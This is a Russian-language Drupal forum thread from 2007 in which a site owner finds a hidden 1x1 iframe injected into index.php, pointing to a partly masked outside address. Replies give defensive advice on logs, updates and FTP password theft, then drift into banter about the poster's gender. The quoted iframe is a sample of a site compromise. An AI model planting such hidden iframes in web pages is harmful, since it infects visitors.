14 января 2007 в 22:34
Стал сайт не по-детски глючить и т п...
Ошибки стал выдавать типа cannot modify header information....
Лезу в файл settings - все нормально вроде.
ошибка идет из файла index.php
Лезу туда и вижу прелестнейший текст:
iframe src="http://81.95.146.***/sp_pack/counter/index.php" width=1 height=1>
Содержимое сайта публикуется на условиях CreativeCommons Attribution-ShareAlike 3.0 или более поздней версии. Программные коды в тексте статей — на условиях GNU GPL v2 или более поздней версии.
Документация по совместной работе с репозиторием drupal.ru – https://docs.drupal.ru/code
Drupal – торговая марка Дриса Бёйтарта
Поддерживать инфраструктуру Drupal.ru нам помогает компания ДАЛЕЕ
Комментарии
Это следствие, а причину надо искать вне index.php. Кто-то успешно взломал сайт, следует проверить все файлы и базу - возможно удастся выявить способ атаки и найти уязвимость. Надо просмотреть все файлы относящиеся к данному виртуальному хосту на предмет даты последнего изменения - если дата изменений та же что у index.php, то проверить содержимое файлов. Посмотреть нет ли других лишних файлов на сайте, посмотреть логи вебсервера вокруг даты взлома - по ним можно иногда выявить способ, например перебор пароля и т.п., когда встречается много однотипных обращений с какого-то хоста. С большой вероятностью можно вычислить ip взломщика (хотя бы прокси через который он ходил и понять, что взломщик не дурак
Затем, если версия друпала отстаёт от последней стабильной, то апгрейднуться до текущей (4.7.5). Также посмотреть список установленных модулей и упоминаний уязвимостей на http://drupal.org/security и обновить (или удалить если нет обновлений) сторонние модули с уязвимостями.
И это произошло на shared хостинге или своём сервере? Для shared-хостинга очевидно возможности проверки и профилактики ограничены, на своём сервере можно принять дополнительные меры, во избежание подобных проблем в будущем.
--
Администратор сайта «Drupal — Россия»
на вопросы по Drupal отвечаю только на форумах, не пишите в почту и приватом!
Могли пароль к фтп например подобрать. Например снифером.
Вообще взлом сайта на друпале большая редкость. На моей памяти это первый если не считать историю с xmlrpc. Скорее всего к нему это отношения не имеет.
а хостер случаем не valuehost?
TeVi, вы хоститесь не на Valuehost? Подобным трояном были относительно недавно заражены тамошние сайты - в файлы index.* дописывается iframe c рекламно-порнографической информацией.
Причем добавление кода производится, видимо, программным способом, автоматически, поскольку вставка iframe может попадать вне тегов body - /body или даже html - /html. Так было, к примеру, на моем сайте, написанном вообще на parser'е.
Хостер посоветовал почаще менять пароли на FTP и ввел принудительное их обновление через определенное время. Отсюда можно предположить, что ломали сайты через подбор пароля FTP.
у меня на некоторых фтп аккаунтах юзеров которые пользовались виндой - своровали за год пароль по нескольку раз троянами - подтвердив известный постулатъ что винда без трояна не бывает, это видно когда начинаешь анализировать откуда коннектятся на сервер.
Никаких снифферов и а тем более подборов небыло - своровали и все.
Ну просто битва Добра со Злом. Почти как в "Ночном Дозоре": "И треснул мир напополам, дымит разлом, и меркнет свет, идёт борьба... " ... Виндов с Линуксом.
Кибер-религиозные войны...
Шутки-шутками а я из windows не рискую рабочие сервера администрировать. Хотя конечно если SSH с авторизацией по ключу, то можно хоть из windows, но так там консоли удобной нет.
--
Администратор сайта «Drupal — Россия»
на вопросы по Drupal отвечаю только на форумах, не пишите в почту и приватом!
Хостинг не Valuehost, я в Украине.
Хостинг один из лучших вроде.
Подозреваю, что могло и с моего компа попасть - после обнаружения этого глюка запустив проверку выловила несколько троянов (не знаю когда они попали до или после хождения по ссылке...)
Ушел менять пароли и звонить хостеру...
Этот троян все пароли воровать умеет или только к фтп и к красивым номерам ICQ?
Таки "выловила" или "ушел"? Вы, уважаемый(ая) уж определитесь со своей половой принадлежностью
---
http://drupal5.ru - информация для друпателей
качественные ответы только на качественные вопросы
Привычка дурная говорить о себе в мужском роде.
Половая принадлежность - ж
блондинка - потому глупых вопросов будет многа
Посмотрел, оценил, влюбился
---
http://drupal5.ru - информация для друпателей
качественные ответы только на качественные вопросы
Вот для меня это тож остается загадкой. Если мужчина себя именует в женском роде, то явно указывает на свою сексуальную ориентацию. А женщины замечал нередко именуют себя в мужском роде при этом вроде как ничего не подразумевая.
--
Администратор сайта «Drupal — Россия»
на вопросы по Drupal отвечаю только на форумах, не пишите в почту и приватом!
Полагаю, что избежать заражения или взлома с гарантией на 100% не может ни один хостинг. Valuehost тоже в общем-то неплохой хостинг, имхо. Как бы его ни критиковали.
Дело, скорее, просто в том, что владельцу сайта надо "соблюдать гигиену" - периодически проверять систему на вирусы, трояны и прочую нечисть, следить за обновлениями безопасности, избегать "случайных связей" со спаммерами
А троянов могло быть несколько.
Я думаю, имелось в виду, что "проверка выявила" ;)---
---
All content management systems suck, Drupal just happens to suck less. -- Boris Mann at DrupalCON Amsterdam, August 2005.
А что подразумевалось под "снесла"? ))
Обожаю разносторонних людей
В хорошем смыле, не поймите меня превратно.
---
http://drupal5.ru - информация для друпателей
качественные ответы только на качественные вопросы
Судя по сообщениям TeVi, всё таки "выловила"
...мы своими подозрениями всех девушек с сайта распугаем.
Natalie заподозрили, что она не Natalie, так она на месяц (или больше?) на сайте не показывалась
да ладно, меня распугать трудно, разве что таки соберусь сайт ручками написать
Тогда свою cms. HTML ручками это несовременно )
--
Администратор сайта «Drupal — Россия»
на вопросы по Drupal отвечаю только на форумах, не пишите в почту и приватом!
---Это уже было несколько позже, и вовсе не поэтому
Сейчас опять начнется учеба, так что снова скорее всего пропаду 
ЗЫ некоторые дамы говорят о себе в мужском лице. Лично таких знаю...
---
All content management systems suck, Drupal just happens to suck less. -- Boris Mann at DrupalCON Amsterdam, August 2005.
У меня была мысль сделать себе девушку виртуала, ИМХО им отвечают охотнее )) Но как-то не сложилось
25, замужем
Муж ревнивый?
---
http://drupal5.ru - информация для друпателей
качественные ответы только на качественные вопросы
rapitosov@drupal.org, от москвы до киева далеко
Насколько знаю Рапитосова, ему это не помеха )
--
Администратор сайта «Drupal — Россия»
на вопросы по Drupal отвечаю только на форумах, не пишите в почту и приватом!
от москвы до киева далеко
ага, именно
18 часов - это не далеко
---
http://drupal5.ru - информация для друпателей
качественные ответы только на качественные вопросы